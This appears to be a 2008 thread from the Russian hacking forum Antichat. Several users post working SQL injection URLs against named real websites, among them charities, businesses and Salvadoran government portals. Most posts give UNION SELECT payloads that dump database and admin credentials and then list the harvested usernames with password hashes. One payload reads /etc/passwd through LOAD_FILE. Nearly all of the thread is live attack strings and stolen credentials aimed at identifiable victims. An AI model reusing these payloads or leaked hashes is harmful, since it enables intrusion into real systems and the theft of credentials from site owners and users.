07.01.2008, 01:39
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
www.pdma.org
http://www.pdma.org/
http://www.pdma.org/news.php?ID=213+union+select+1,concat(user,char(58 ),password),3,4,5,6,7,8,9,10+from+mysql.user/*
root:0cfc2076799e429f:hippo
еще есть таблица user
http://www.pdma.org/news.php?ID=213+union+select+1,2,3,4,5,6,7,8,9,10+ from+user/*
Но колонки подпбрать не смог
|
|
|
07.01.2008, 01:46
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
www.dadcomehome.org
http://www.dadcomehome.org/
http://www.dadcomehome.org/news.php?strid=1217&id=-2408+union+select+1,concat(username,char(58),passw ord),3,4,5,6,7,8,9,10,11,12,13,14+from+users/
admin:9a997d8da071c76edc7aa3e9a89b251d
|
|
|
|
07.01.2008, 01:48
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
http://www.tabdc.org/news.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5/*
|
|
|
|
07.01.2008, 01:56
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
Tigger клей посты аднака !!!
|
|
|
|
07.01.2008, 01:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
www.eurowizja.org
http://www.eurowizja.org/
http://www.eurowizja.org/news.php?id=-1149+union+select+1,table_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16+from+information_schema.tables+lim it+1,48/*
|
|
|
|
07.01.2008, 02:00
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Хорошо...сначала наберу матириала, а потом выложу=))
|
|
|
|
07.01.2008, 02:17
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,3,4,5,6/*&status=2
http://www.grfoundation.org/news.php?id=-110+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.seacoastrugby.org/
http://www.seacoastrugby.org/news.php?id=-141+union+select+1,2,concat(username,char(58),pass word,char(58),email),4+from+mos_users/*
admin:f749b2d0d046218a980aa301950d6aa7:rugbyboy
Админку не нашел
|
|
|
|
07.01.2008, 02:48
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Че-то за мной все стали оранджевым писать, плагиат однако, надо было копирайты ставить)))
http://www.proactiva.com.sv/
Код:
http://www.proactiva.com.sv/lanzamiento_det.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9/*
http://www.delcamino.org.sv/
Код:
http://www.delcamino.org.sv/newsDetail.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.nombredejesus.gob.sv/
Код:
http://www.nombredejesus.gob.sv/pages/noticias.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x78),0x78),4,5,6,7+from+mysql.user/*
root:0ba072e62d7711e2
http://www.mag.gob.sv/ Министерство Агрокультуры Сальвадора))))
Код:
http://www.mag.gob.sv/main/index.php?id=-1'+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10+from+mysql.user/*&mostrar=full&secc=98&nivel=&tabs=4&pivote=1&ids=97
root:2fa7f6d5676bffd5
Таблица админа:
Код:
http://www.mag.gob.sv/main/index.php?id=-1'+union+select+1,2,3,concat_ws(0x3a,usuario,password),5,6,7,8,9,10+from+agroelsalvador.admin_emark+limit+0,1/*&mostrar=full&secc=98&nivel=&tabs=4&pivote=1&ids=97
Колонка password также содержится в
banner : phpads_affiliates
encuestas:users
moodle:mdl_course
moodle:mdl_course_request
moodle:mdl_hotpot
moodle:mdl_lesson
moodle:mdl_lesson_default
moodle:mdl_quiz
moodle:mdl_user
moodle:mdl_workshop
openreports:REPORT_DATASOURCE
openreports:REPORT_USER
Мускул 5, кому надо, тот расковыряет... |
|
|
|
07.01.2008, 06:24
|
|
Новичок
Регистрация: 05.01.2008
Сообщений: 23
С нами:
9657626
Репутация:
2
|
|
http://www.ultraproducts.com/
http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3b,password) +from+users+limit+0,1/*
|
|
|
|
07.01.2008, 06:58
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
2Ded MustD!e: ыыы, сделаю красным пожалуй  )).
Опять .AU, надеюсь никого еще этим не задолбал .
http://my.highway1.com.au/
http://my.highway1.com.au/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,convert(concat_ws(0 x3A,username,password)+using+latin1),10,11,12,13,1 4,15+from+users/*
О чем сайт я не понял. По URL'у /admin/ по идее распологаеться админка, к которой доступ 403 Forbidden. Также рекомендую посмотреть крайне информативный robots.txt, что этим хотели сказать я также не понял  . Для тех, кто интересуеться, есть file_priv:
http://my.highway1.com.au/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,convert(LOAD_FILE(c har(47,101,116,99,47,112,97,115,115,119,100))+usin g+latin1),10,11,12,13,14,15+from+users/*
Вот только magic_quotes=on, так что идея получить шелл через скуль обрубаеться на корню.
http://www.ellaways.com.au/
http://www.ellaways.com.au/news.php?id=-1+UNION+SELECT+1,2,USER(),4,5,6,7,8,9/*
Вообщем сайт тоже очень непонятный по контенту  . Зато есть админка и даже с правом доступа в директории /admin/ Вот только аккаунта админа я не знаю, т.к. таблицы я не подобрал . |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
